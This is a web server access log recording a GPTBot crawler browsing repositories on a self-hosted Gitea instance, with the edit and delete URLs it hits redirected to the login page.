"/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" [Client 74.7.227.38] [Length 13602] [Gzip 6.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" -[17/Feb/2026:17:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16194] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11006] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:17:34:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:34:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176985] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:17:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:17:34:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" -[17/Feb/2026:17:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/cpp" -[17/Feb/2026:17:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/main.py?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" -[17/Feb/2026:17:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" -[17/Feb/2026:17:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72030] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10098] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 660134] [Gzip 25.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 1540] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11844] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11840] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11840] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/controller-cpp.md" -[17/Feb/2026:17:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" -[17/Feb/2026:17:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16606] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" -[17/Feb/2026:17:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" -[17/Feb/2026:17:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17360] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:17:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13919] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13919] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36195] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 